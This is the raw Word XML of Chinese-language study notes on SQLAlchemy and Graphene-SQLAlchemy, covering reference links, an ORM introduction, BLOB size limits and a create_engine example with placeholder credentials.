    <w:p w14:paraId="49A682B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="_Toc159780023"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="590"/>
    </w:p>
    <w:p w14:paraId="13F15636" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C852425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="591" w:name="_Toc159780024"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Graphene-SQLAlchemy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:p w14:paraId="0AC860B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://docs.graphene-python.org/projects/sqlalchemy/en/latest/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432BB3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69464244" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Graphene-SQLAlchemy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF635A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC32D9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B9C989" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07755D06" w14:textId="35CF33AB" w:rsidR="004C452C" w:rsidRDefault="001C75CB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="592" w:name="_Toc159780025"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>RM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: sqlalchemy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="592"/>
    </w:p>
    <w:p w14:paraId="625A8BCE" w14:textId="77777777" w:rsidR="00FE21A2" w:rsidRDefault="00FE21A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524CF6AD" w14:textId="77777777" w:rsidR="00042589" w:rsidRDefault="00042589" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F2575A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.sqlalchemy.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E02B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648A28D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://zhuanlan.zhihu.com/p/91169446</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D0F7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E579994" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git: https://github.com/sqlalchemy/sqlalchemy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABAFEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1289569E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象关系映射器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object Relational Mappers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在过去数年吸引了不少人的目光。主要原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经常会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序框架中被提起，因为它是快速开发（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rapid Development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）栈中的关键组件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ruby on Rails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架采用了设计一个独立栈的方法，将自主开发的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>紧密集成到该框架中。而其他框架，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pylons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Turbogears </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Grok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则采用更加基于组件的架构结合可交换的第三方组件。两种方法都有各自的优势：紧密集成允许非常连贯的体验（如果问题映射到框架），而基于组件的架构则允许最大的设计灵活性。但是，本文的主题并不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架；而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CCA95D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8A36F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="593" w:name="_Toc159780026"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>概念</w:t>
      </w:r>
      <w:bookmarkEnd w:id="593"/>
    </w:p>
    <w:p w14:paraId="006A9372" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="12317606" wp14:editId="0E897BEE">
            <wp:extent cx="5486400" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A73271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="594" w:name="_Toc159780027"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见数据类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w14:paraId="1046CB1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4B641255" wp14:editId="59201B8C">
            <wp:extent cx="5486400" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA96AD" w14:textId="37E891C0" w:rsidR="004C452C" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储二进制数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D27B81" w14:textId="6CCC3F12" w:rsidR="009C0340" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r w:rsidR="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（默认是</w:t>
      </w:r>
      <w:r w:rsidR="00A47625" w:rsidRPr="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00A47625" w:rsidRPr="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A47625" w:rsidRPr="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r w:rsidR="00A47625" w:rsidRPr="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidR="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型用于存储二进制大对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BLOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实际上可以存储非常大的数据。其大小限制通常取决于你所使用的数据库管理系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8BA1D" w14:textId="77777777" w:rsidR="009C0340" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0568B17F" w14:textId="77777777" w:rsidR="009C0340" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型最大可以存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>64KB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MEDIUMBLOB</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>16MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则可以存储达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4GB</w:t>
      </w:r>
      <w:r w:rsidRPr="00534BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或者被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BYTEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）类型可以存储达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据。因此，你应该根据你的数据库系统以及实际需求来决定使用何种类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E0924" w14:textId="77777777" w:rsidR="009C0340" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44615FCD" w14:textId="77777777" w:rsidR="009C0340" w:rsidRDefault="009C0340" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00485CAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r w:rsidRPr="00485CAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型时，你还可以选择传入一个长度参数来指定最大长度，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LargeBinary(1048576)</w:t>
      </w:r>
      <w:r w:rsidRPr="00485CAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将会存储最大</w:t>
      </w:r>
      <w:r w:rsidRPr="00485CAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1MB</w:t>
      </w:r>
      <w:r w:rsidRPr="00485CAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是请注意，这个参数可能不被所有数据库系统支持，具体取决于你的数据库系统的实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F816AC" w14:textId="77777777" w:rsidR="00312F42" w:rsidRDefault="00312F42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBC3F36" w14:textId="77777777" w:rsidR="007049E0" w:rsidRDefault="007049E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FED6281" w14:textId="77777777" w:rsidR="00312F42" w:rsidRDefault="00312F42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC9D7B9" w14:textId="77777777" w:rsidR="00312F42" w:rsidRDefault="00312F42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5A9BFE" w14:textId="77777777" w:rsidR="00312F42" w:rsidRDefault="00312F42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EA332E" w14:textId="77777777" w:rsidR="00312F42" w:rsidRDefault="00312F42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A32E18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from sqlalchemy import create_engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C3C9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BAEDB5" w14:textId="5222D53D" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>engine = create_engine("mysql://user:password@hostname/dbname?charset=utf8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E2B79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>engine = create_engine("mysql://user:password@hostname/dbname?charset=utf8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1677F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                       echo=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804B1EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                       pool_size=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A5BF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                       pool_recycle=60*30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16D32B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                       )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AFFA8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时会将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句转化为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句打印，一般</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候可用</w:t>
      </w:r>
    </w:p>
